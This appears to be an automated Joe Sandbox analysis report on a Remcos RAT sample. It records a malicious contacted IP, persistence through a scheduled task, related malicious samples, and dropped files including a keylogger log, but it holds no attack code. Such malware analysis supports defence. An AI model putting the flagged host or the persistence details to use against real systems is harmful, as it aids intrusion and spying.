                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              178.237.33.50
                                                                                                                                              		geoplugin.netNetherlands
                                                                                                                                              		8455ATOM86-ASATOM86NLfalse
                                                                                                                                              192.3.64.152
                                                                                                                                              		unknownUnited States
                                                                                                                                              		36352AS-COLOCROSSINGUStrue

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1569374
                                                                                                                                              Start date and time:2024-12-05 18:24:13 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 33s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:25
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:LdSbZG1iH6.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@29/27@1/2
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                              • Number of executed functions: 196
                                                                                                                                              • Number of non-executed functions: 303
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                              Warnings

                                                                                                                                              • Exclude process from analysis (whitelisted): WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 52.182.143.212
                                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • VT rate limit hit for: LdSbZG1iH6.exe

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              12:25:30API Interceptor3x Sleep call for process: LdSbZG1iH6.exe modified
                                                                                                                                              12:25:32API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                                              12:25:36API Interceptor399887x Sleep call for process: DGlxtFUfY.exe modified
                                                                                                                                              12:26:30API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                              17:25:34Task SchedulerRun new task: DGlxtFUfY path: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              178.237.33.50tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • www.geoplugin.net/json.gp?ip=
                                                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              togiveme.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              greatnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              cUxXrdUvYR.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              geoplugin.nettXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              togiveme.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              greatnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              cUxXrdUvYR.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              AS-COLOCROSSINGUSmaybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                                              • 172.245.123.3
                                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                              • 107.172.44.175
                                                                                                                                              bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                                              • 107.172.44.175
                                                                                                                                              nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                              • 198.46.178.192
                                                                                                                                              dgreatth.docGet hashmaliciousUnknownBrowse
                                                                                                                                              • 192.3.95.197
                                                                                                                                              MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.168.7.19
                                                                                                                                              fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.168.7.19
                                                                                                                                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 198.23.133.131
                                                                                                                                              boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 198.23.133.131
                                                                                                                                              boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 198.23.133.131
                                                                                                                                              ATOM86-ASATOM86NLtXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              togiveme.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              greatnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              cUxXrdUvYR.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DGlxtFUfY.exe_fa2c3f154e84f330f7c1e4a6bbafa470d01824_11f54abd_af3969b5-4bbf-425c-a680-1a8dd4a5027f\Report.wer

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):1.009719518921121
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:WR9xvk9qI0BU/wjkZraHt2zuiFyZ24IO8k:M9xvk9qjBU/wjizuiFyY4IO8k
                                                                                                                                              MD5:E5BBD4409FDCC18D61E7DAFABD04FD16
                                                                                                                                              SHA1:7B7813D501264E495C136FADAE43D5E746A93C61
                                                                                                                                              SHA-256:89FDE3CD041C6B724A7709962C4E75A55CA186C547D8FD3FAE0D6810087EEC57
                                                                                                                                              SHA-512:F4AF58F3D4AD141B762969D0A694F0EC0BF684AA8777EA4C4E4E209B1FE8793C6485542CA0F26C37CAB87FC9EAABF6FBBBC76E313952C5C63B68A152829B84F1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.3.2.2.2.0.5.2.4.6.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.3.2.2.2.7.3.9.9.5.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.3.9.6.9.b.5.-.4.b.b.f.-.4.2.5.c.-.a.6.8.0.-.1.a.8.d.d.4.a.5.0.2.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.6.7.d.e.3.8.-.a.9.e.c.-.4.5.0.4.-.a.9.c.4.-.f.2.9.9.b.8.1.5.d.0.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.G.l.x.t.F.U.f.Y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Z.P.y.J...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.f.c.5.3.-.2.c.b.3.3.a.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.a.2.b.f.f.d.f.2.d.0.5.6.d.8.6.5.4.d.6.b.1.c.0.5.7.3.f.b.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.5.6.c.4.7.2.4.e.d.e.f.9.a.8.f.e.f.4.9.0.5.2.0.e.c.a.e.b.3.0.c.8.3.5.6.e.3.1.4.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_9bd6f1a5-e3da-4944-9387-445933437085\Report.wer

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):0.5831712158236109
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:1P+FZaGRasQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTA0f/VXT5Nm:1GzlRak0WbkQzuiFyZ24IO8b
                                                                                                                                              MD5:D1C2AF97D35EF050EB52983B3CC637A6
                                                                                                                                              SHA1:F2746F8BAC1FF7F75E0DD7720EFBE6BBA0BEDB36
                                                                                                                                              SHA-256:EFA9605758CA45BA931673AF1E18BED958DA11FC27CF8DFF0F363CF26F97C529
                                                                                                                                              SHA-512:45851EE1D754ECCE71AD974270C8DE4E1F0A9035DCE8101C9321A6BFECFC3E16C655AE7360DCE888C86D2E0D5AC606D7FFF683B2A406DCA2BA7A531B2F043700
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.3.1.6.2.2.7.6.5.9.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.3.1.6.6.7.1.4.0.9.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.d.6.f.1.a.5.-.e.3.d.a.-.4.9.4.4.-.9.3.8.7.-.4.4.5.9.3.3.4.3.7.0.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.9.d.5.f.2.-.8.b.9.d.-.4.2.4.7.-.8.8.5.8.-.3.1.d.9.3.c.3.e.a.7.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.4.-.0.0.0.1.-.0.0.1.4.-.c.d.3.9.-.6.f.c.1.3.a.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.a.2.b.f.f.d.f.2.d.0.5.6.d.8.6.5.4.d.6.b.1.c.0.5.7.3.f.b.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.5.6.c.4.7.2.4.e.d.e.f.9.a.8.f.e.f.4.9.0.5.2.0.e.c.a.e.b.3.0.c.8.3.5.6.e.3.1.4.!.D.G.l.x.t.F.U.f.Y...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEC6.tmp.dmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:27:02 2024, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):152738
                                                                                                                                              Entropy (8bit):1.7748812931649318
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:b5sWe57eqRCinPG9DDe0Sl+Uf7GjIjfHcE:bWReW/nPqFSl+Uf7GjIjfcE
                                                                                                                                              MD5:17C7ACF8C7FFCB48F57D034733860C1E
                                                                                                                                              SHA1:2826A17036EEB0636F9147193AA45CA23402A165
                                                                                                                                              SHA-256:AE2772C97875F6E7753068093D9108C90DBFE02AB6B9F3DC6B0D921ABC8619D4
                                                                                                                                              SHA-512:BC4968C4D49E722675FE18A692EA4304B6F053E73D6724F3E00F9A70C120F74483B5D6782D34FC398FA052840B49747B2A90CE2409CA17CE71176C6565D973C1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MDMP..a..... .......f.Qg........................|...........$...<[..........T.......8...........T............=..............."..........t$..............................................................................eJ.......%......GenuineIntel............T.............Qg............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE1.tmp.WERInternalMetadata.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6316
                                                                                                                                              Entropy (8bit):3.7286847528759903
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:RSIU6o7wVetbLeA6mwNeYTQE/JZz5aM4Ui89bPvZtsf079vZm:R6l7wVeJLx6KYTZpri89bnZtsf07tZm
                                                                                                                                              MD5:6F03A73EB97CD1217181D740813F7AB4
                                                                                                                                              SHA1:DDFF2D73FA1202306FD0F2B8A63172228DA99A73
                                                                                                                                              SHA-256:5EA81AD82E66B205DB358156916313416FE8CD230D6E23FE42E25C632687E22C
                                                                                                                                              SHA-512:800A0016B3F1D90EE799D8EC4DEBF90BB3C6A576CFBC808DC66C35F41922CDDB4BEE085AE4BF738B597A8A6A8B554670EFC8A4EECD34B148DE378BD3917FA00D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERC010.tmp.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4631
                                                                                                                                              Entropy (8bit):4.484518422524437
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwWl8zsZaJg77aI91OjrWpW8VYBDYm8M4JBsp5F8p/+q8jcFu6Sb30+yd:uIjfiI73D7VOWJB926q0+yd
                                                                                                                                              MD5:0D7BDD3B293523E4DAE4B2D01452CAD6
                                                                                                                                              SHA1:6876913E8C8BC1D0D5E0B6C91A23ACA802D0F4A7
                                                                                                                                              SHA-256:8D42407E36667CD3446E360CF1CD3AB11518E943B5DD4A77009A7CE1808DD300
                                                                                                                                              SHA-512:F27169EF6A8453F63DFDC6FDCBC84576B592F4A8506B6AC118165C84C0210CDC1FC72679261E81796D310DDD5F22E37ADC0B6DAB7300B63C934A852ADF6544C4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE522.tmp.WERInternalMetadata.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8262
                                                                                                                                              Entropy (8bit):3.6833918989312133
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:R6l7wVeJd96V6YLs634gmfU7pxr89bMXsfrkm:R6lXJX6V6Yw634gmfUYMcft
                                                                                                                                              MD5:7373759B68DBB409A247AA5BBED9EABE
                                                                                                                                              SHA1:800BD57A52BC13F395DCCBCE5FE21D11072BA7CA
                                                                                                                                              SHA-256:1D86347B18092039F82CFFC789C9BBC737FAFC35467B0042CA87F4BD901FBAC6
                                                                                                                                              SHA-512:9DA1D391C868D148C1EDA5FB970880611399DE1F3374808712D88F102688C34187709DB9F63F9609A919843B464ED93E4ABC2673D38290967E42353739569216
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.4.8.<./.P.i.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE542.tmp.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4576
                                                                                                                                              Entropy (8bit):4.454611202851358
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwWl8zsZxJg77aI91OjrWpW8VY6Ym8M4JTHFh5P+q8795Sb33iWd:uIjftI73D7VqJLFY5q3iWd
                                                                                                                                              MD5:04BD279EF7101807C8AC3A024A8B2BD2
                                                                                                                                              SHA1:5FEC8B03277AB8C40DEED1ED6706A736296A23EE
                                                                                                                                              SHA-256:55E5812D43CF3880CB25E405BF1DE4C45BE22CE108A986E0F006BA6458238EFD
                                                                                                                                              SHA-512:FD4AFEE9384ACD1DBEB13CAD06D9D47763416EAEC5262D77A2D851E3B1944BEDB56F48E28A6F24FBF9AA8EBA715FCDA73893D5A3D6BF3629BFE994964427299F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                              C:\ProgramData\remcos\logs.dat

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):144
                                                                                                                                              Entropy (8bit):3.373583598653465
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:rhlKlyKmyfNlJlWFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lZmyhb5YcIeeDAlOWAv
                                                                                                                                              MD5:0D7004FECAC2A7724C5BC83EE77BCB0F
                                                                                                                                              SHA1:BBFC7A2967C7479D4C738436A1ECC55F4FD3B555
                                                                                                                                              SHA-256:6162228789E2B12F170C6DDB04B39B0D8F25680A57848648869CBD70C0880899
                                                                                                                                              SHA-512:97A1680811A6E6091ED00D451885C8D8137F500EE7E761ED09F07EF8023A45EE9F8441F1C2F478C5ACA652831ED6F72794311E63C8D0E355C8236B32CFE29E08
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                              Preview:....[.2.0.2.4./.1.2./.0.5. .1.2.:.2.5.:.3.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DGlxtFUfY.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
